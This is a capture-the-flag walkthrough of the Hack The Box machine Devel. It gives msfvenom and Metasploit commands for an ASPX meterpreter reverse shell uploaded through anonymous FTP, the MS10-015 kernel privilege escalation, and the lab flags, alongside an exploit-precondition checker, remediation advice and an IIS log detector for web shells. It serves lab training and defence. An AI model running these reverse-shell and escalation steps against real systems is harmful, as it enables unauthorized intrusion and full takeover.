
Devel HTB Walkthrough

Machine Information

Name: Devel
Platform: Hack The Box
OS: Windows
Difficulty: Easy
Target IP: 10.129.2.151
Attacker IP: 10.10.14.106

Executive Summary

Devel is a Windows-based Hack The Box machine that demonstrates common misconfigurations in web services. The machine exposes an anonymous FTP service with write permission on the IIS web root, so an initial foothold is obtained simply by uploading an ASPX web shell and requesting it over HTTP. Privilege escalation from the application pool identity to SYSTEM is achieved through KiTrap0D (MS10-015), a well-known Windows kernel vulnerability.


Reconnaissance

Initial Scan

We begin with a full TCP port scan (all 65535 ports, connect scan) to identify open services:

export target=10.129.2.151
sudo nmap -p- --min-rate 1000 -sT -vvv $target

Scan Results:

Discovered open ports: 21/tcp (FTP), 80/tcp (HTTP)

Service Enumeration

Perform detailed service version detection and script scanning:

sudo nmap -sC -sV -p 21,80 -T4 $target

Detailed Results:

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       <DIR>          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Key Findings

  1. FTP Service (Port 21)
    • Microsoft FTPd (the IIS FTP service)
    • Anonymous authentication enabled (FTP code 230)
    • Write access permitted (not visible in the scan; confirmed by the upload below)
    • Listing contains the stock IIS web root files (aspnet_client, iisstart.htm, welcome.png), so the FTP root is the web root
  2. HTTP Service (Port 80)
    • Microsoft IIS 7.5
    • Default IIS7 page visible
    • TRACE method enabled (cross-site tracing; low severity on its own)


Initial Foothold

FTP Analysis

Anonymous FTP login succeeds, and the listing matches the contents of a stock IIS web root (C:\inetpub\wwwroot):

ftp $target
Name: anonymous
Password: [any email or blank]

Directory Contents:

03-18-17  01:06AM       <DIR>          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png

Web Shell Deployment

The FTP root is the IIS web root and IIS maps the .aspx extension to the ASP.NET handler, so any file we upload with that extension is compiled and executed server-side as soon as it is requested over HTTP. Generate a reverse-shell ASPX page with msfvenom (the default windows/meterpreter/reverse_tcp payload is x86):

msfvenom -p windows/meterpreter/reverse_tcp -f aspx LHOST=10.10.14.106 LPORT=4444 > exploit.aspx

Upload the payload via FTP:

ftp> put exploit.aspx

Reverse Shell Setup

Configure the Metasploit handler; it must be listening before the uploaded page is requested:

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.106
set LPORT 4444
run

Requesting http://$target/exploit.aspx (in a browser or with curl) makes IIS compile and run the page, which connects back to the handler:

[*] Started reverse TCP handler on 10.10.14.106:4444
[*] Sending stage (175174 bytes) to 10.129.2.151
[*] Meterpreter session 7 opened (10.10.14.106:4444 -> 10.129.2.151:49158)

Initial Compromise Verification

meterpreter > getuid
Server username: IIS APPPOOL\Web


Privilege Escalation

System Enumeration

The initial shell runs with limited privileges under the IIS application pool identity (IIS APPPOOL\Web), which is not a member of the local Administrators group. We need to escalate to SYSTEM.

Local Exploit Suggester

Use Metasploit’s local exploit suggester to identify potential privilege escalation vectors:

meterpreter > background
use post/multi/recon/local_exploit_suggester
set SESSION 7
run

Suggested modules:

[+] The target appears to be vulnerable.
1. exploit/windows/local/bypassuac_comhijack
2. exploit/windows/local/bypassuac_eventvwr
3. exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move
4. exploit/windows/local/ms10_015_kitrap0d

The suggester only checks the preconditions it can see. The two UAC bypasses require a session that already belongs to the local Administrators group, which IIS APPPOOL\Web does not, so they would fail here; the BITS bug and the kernel bug are the real candidates.
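A kernel exploit can crash the target, so it pays to confirm its preconditions from `systeminfo` before firing it. The following is an added example (not part of the original walkthrough) that parses a systeminfo dump and checks the three things that decide whether KiTrap0D applies: the fixing hotfix (MS10-015 shipped as KB977165) is absent, the OS is 32-bit (the bug is in the x86 VDM path and the Metasploit module is x86 only), and the NT version is 6.1 (Windows 7 / Server 2008 R2) or older. The SAMPLE_SYSTEMINFO text and its KB numbers are constructed, not real Devel output.

```python
"""Gate a kernel-exploit attempt on what systeminfo says.  Added example with
a constructed systeminfo excerpt; not part of the original walkthrough."""
import re

# Bulletin -> fixing KB, architectures the public exploit supports, and the
# highest affected NT version.  MS10-015 (KiTrap0D, CVE-2010-0232) was fixed
# by KB977165; the bug is in the 32-bit VDM path and the Metasploit module is
# x86 only; Windows 7 / Server 2008 R2 (NT 6.1) are the last affected releases.
KERNEL_BULLETINS = {
    "MS10-015": {"kb": "KB977165", "arch": {"x86"}, "max_version": (6, 1)},
}

# Constructed sample in the layout systeminfo prints; the KB numbers are
# placeholders, not real Devel hotfixes.
SAMPLE_SYSTEMINFO = """\
Host Name:                 DEVEL
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB2500000
                           [02]: KB2600000
"""

KEY_LINE = re.compile(r"^(OS Name|OS Version|System Type):\s+(.*?)\s*$")
HOTFIX_LINE = re.compile(r"\[\d+\]:\s*(KB\d+)", re.IGNORECASE)


def parse_systeminfo(text):
    """Pull the three fields the decision needs plus the installed KB set."""
    info = {"hotfixes": set()}
    for line in text.splitlines():
        m = KEY_LINE.match(line)
        if m:
            info[m[1]] = m[2]
            continue
        m = HOTFIX_LINE.search(line)
        if m:
            info["hotfixes"].add(m[1].upper())
    return info


def os_version_tuple(version_field):
    """'6.1.7600 N/A Build 7600' -> (6, 1); unknown -> (0, 0)."""
    m = re.match(r"(\d+)\.(\d+)", version_field)
    return (int(m[1]), int(m[2])) if m else (0, 0)


def arch_of(system_type):
    """'X86-based PC' -> 'x86', 'x64-based PC' -> 'x64'."""
    return "x64" if "x64" in system_type.lower() else "x86"


def check_bulletin(info, bulletin):
    """Return (likely_exploitable, reasons_it_is_not)."""
    spec = KERNEL_BULLETINS[bulletin]
    reasons = []
    if spec["kb"] in info["hotfixes"]:
        reasons.append(f"{spec['kb']} installed")
    arch = arch_of(info.get("System Type", ""))
    if arch not in spec["arch"]:
        reasons.append(f"arch {arch} not supported by the exploit")
    if os_version_tuple(info.get("OS Version", "")) > spec["max_version"]:
        reasons.append("OS newer than the affected range")
    return (not reasons, reasons)


if __name__ == "__main__":
    # On a live session run `systeminfo` from the meterpreter shell and feed
    # its output here instead of the constructed sample.
    print(check_bulletin(parse_systeminfo(SAMPLE_SYSTEMINFO), "MS10-015"))
```

One caveat the check cannot see: the meterpreter session itself must be x86 as well. The default msfvenom payload used above is, which is why the module works from this session.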

Kernel Exploit (MS10-015)

KiTrap0D (MS10-015, CVE-2010-0232) is a flaw in the 32-bit Windows kernel's handling of the VDM subsystem; it affects Windows 2000 through Windows 7 on x86 only, and the Metasploit module needs an x86 session, which the default x86 meterpreter payload used above provides:

use exploit/windows/local/ms10_015_kitrap0d
set SESSION 7
set LHOST 10.10.14.106
set LPORT 9009
run

Privilege Escalation Successful:

[*] Started reverse TCP handler on 10.10.14.106:9009 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching msiexec to host the DLL...
[+] Process 3804 launched.
[*] Reflectively injecting the DLL into 3804...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.2.151
[*] Meterpreter session 2 opened (10.10.14.106:9009 -> 10.129.2.151:49178)

Privilege Verification

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

meterpreter > shell
whoami
nt authority\system

hostname
devel


Post-Exploitation

Flag Acquisition

User Flag:

type C:\users\babis\desktop\user.txt
ff43ea9f8efca09c9d96e106888ae28b

Root Flag:

type C:\users\administrator\desktop\root.txt
d0c3687882cfedfadfd6015e8eba9664

System Information Gathering

Additional system information collected:


Security Assessment & Remediation

Critical Vulnerabilities Identified

  1. Anonymous FTP with Write Access to the Web Root
    • Risk: Critical
    • Impact: Anyone can upload a server-side script (.aspx) that IIS executes on request, giving remote code execution as the application pool identity
    • Remediation:
      • Disable anonymous FTP access, or make it read-only
      • Never root an FTP site on the IIS web root; use a separate directory in which script execution is disabled
      • Require authenticated users and restrict write permission in the NTFS ACL, not only in the FTP site settings
      • Prefer SFTP (SSH) or FTPS over plaintext FTP so credentials are not sent in the clear
  2. Unpatched Windows Kernel
    • Risk: High
    • Impact: Local privilege escalation from the low-privileged app pool identity to NT AUTHORITY\SYSTEM
    • Remediation:
      • Apply Windows security updates; MS10-015 (KB977165) closes KiTrap0D
      • Implement regular patch management and retire unsupported OS versions
  3. IIS Configuration
    • Risk: Medium
    • Impact: TRACE method enabled (cross-site tracing, possible cookie and header disclosure)
    • Remediation:
      • Disable unnecessary HTTP methods (request filtering, verbs)
      • Use request filtering to deny execution of uploaded file types in upload directories
      • Keep application pools on dedicated, least-privileged identities (as here) so a web shell does not start with more than it needs

Defense Recommendations

  1. Network Security
    • Implement network segmentation
    • Use firewall rules to restrict unnecessary services; FTP should not be reachable from untrusted networks
    • Monitor for anomalous FTP activity, in particular anonymous STOR and DELE commands
  2. Access Control
    • Principle of least privilege for service accounts
    • Regular access reviews
    • Strong password policies
  3. Monitoring & Detection
    • File integrity monitoring on web directories (alert on new .aspx, .asp or .ashx files)
    • SIEM alerts for privilege escalation attempts, e.g. w3wp.exe spawning cmd.exe, or a SYSTEM process with an unexpected parent
    • Regular security audits
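The FTP write and the HTTP request that triggers the shell both land in IIS's own W3C logs, so the whole Devel chain is detectable without an agent. The following is an added example (not part of the original walkthrough) that parses W3C extended logs using their `#Fields:` directive, alerts on successful anonymous STOR of a script file, and raises the severity when the web log later shows that same path served with HTTP 200. The FTP_LOG and WEB_LOG samples are constructed in the IIS 7.5 default field layout; the session id, user agents and timestamps are made up.

```python
"""Detect the Devel chain in IIS logs: an anonymous FTP STOR of a server-side
script into the web root, then an HTTP request for that same path.  Added
example with constructed log lines; not part of the original walkthrough."""
from collections import defaultdict

# Extensions IIS hands to a script engine; a successful anonymous STOR of one
# of these into a web-served directory is a web shell until proven otherwise.
SCRIPT_EXTS = (".asp", ".aspx", ".ashx", ".asmx", ".php", ".cfm", ".jsp")

# Constructed IIS FTP site log (default W3C fields for IIS 7.5 FTP).
FTP_LOG = """\
#Software: Microsoft Internet Information Services 7.5
#Version: 1.0
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2017-03-18 01:10:02 10.10.14.106 - 10.129.2.151 21 ControlChannelOpened - - 0 0 1a2b3c -
2017-03-18 01:10:03 10.10.14.106 - 10.129.2.151 21 USER anonymous 331 0 0 1a2b3c /
2017-03-18 01:10:03 10.10.14.106 anonymous 10.129.2.151 21 PASS *** 230 0 0 1a2b3c /
2017-03-18 01:10:05 10.10.14.106 anonymous 10.129.2.151 21 LIST - 226 0 0 1a2b3c /
2017-03-18 01:10:20 10.10.14.106 anonymous 10.129.2.151 21 STOR notes.txt 226 0 0 1a2b3c /notes.txt
2017-03-18 01:10:30 10.10.14.106 anonymous 10.129.2.151 21 STOR shell.aspx 550 5 0 1a2b3c /shell.aspx
2017-03-18 01:10:41 10.10.14.106 anonymous 10.129.2.151 21 STOR exploit.aspx 226 0 0 1a2b3c /exploit.aspx
"""

# Constructed IIS web site log (default W3C fields for IIS 7.5).
WEB_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status time-taken
2017-03-18 01:09:30 10.129.2.151 GET / - 80 - 10.10.14.106 Mozilla/5.0+(X11) 200 0 0 15
2017-03-18 01:11:02 10.129.2.151 GET /exploit.aspx - 80 - 10.10.14.106 curl/7.88.1 200 0 0 2103
"""


def parse_w3c(text):
    """Parse a W3C extended log.  Field names come from the '#Fields:'
    directive, so one parser serves both the web and the FTP log."""
    fields, rows = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#"):
            continue
        values = line.split()
        if fields and len(values) == len(fields):
            rows.append(dict(zip(fields, values)))
    return rows


def ftp_script_uploads(ftp_rows):
    """Alert on successful (226) anonymous STOR of script files."""
    alerts = []
    for r in ftp_rows:
        if r.get("cs-method") != "STOR" or r.get("sc-status") != "226":
            continue
        if r.get("cs-username", "").lower() != "anonymous":
            continue
        full = r.get("x-fullpath", "-")
        path = full if full != "-" else "/" + r.get("cs-uri-stem", "").lstrip("/")
        if path.lower().endswith(SCRIPT_EXTS):
            alerts.append({"when": f"{r['date']} {r['time']}", "src": r["c-ip"], "path": path})
    return alerts


def correlate_execution(upload_alerts, web_rows):
    """Raise severity when the uploaded script is later requested over HTTP and
    IIS answers 200: the shell ran.  Paths compare case-insensitively because
    NTFS and IIS do; timestamps compare as strings since they are ISO ordered."""
    by_path = defaultdict(list)
    for a in upload_alerts:
        by_path[a["path"].lower()].append(a)
    hits = []
    for r in web_rows:
        stem = "/" + r.get("cs-uri-stem", "").lstrip("/").lower()
        if stem in by_path and r.get("sc-status") == "200":
            when = f"{r['date']} {r['time']}"
            for a in by_path[stem]:
                if when >= a["when"]:
                    hits.append({**a, "executed_by": r["c-ip"], "executed_at": when})
    return hits


if __name__ == "__main__":
    uploads = ftp_script_uploads(parse_w3c(FTP_LOG))
    for hit in correlate_execution(uploads, parse_w3c(WEB_LOG)):
        print("WEB SHELL EXECUTED:", hit)
```

The failed STOR (550) is deliberately not alerted by `ftp_script_uploads`; in a real deployment a burst of denied script uploads from one source is itself worth a lower-severity alert.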

Tools Used

  • nmap (full port scan, -sC -sV service enumeration)
  • ftp client (anonymous login and upload)
  • msfvenom (windows/meterpreter/reverse_tcp ASPX payload)
  • Metasploit: exploit/multi/handler, post/multi/recon/local_exploit_suggester, exploit/windows/local/ms10_015_kitrap0d

Conclusion

The Devel machine demonstrates the critical importance of proper service configuration and patch management. The combination of anonymous FTP write access and unpatched system vulnerabilities created a perfect storm for complete system compromise. This scenario underscores the necessity of:

Difficulty Level: Easy
Key Learning: Never allow anonymous write access to web directories


This walkthrough is for educational purposes only. Always ensure you have proper authorization before conducting security testing.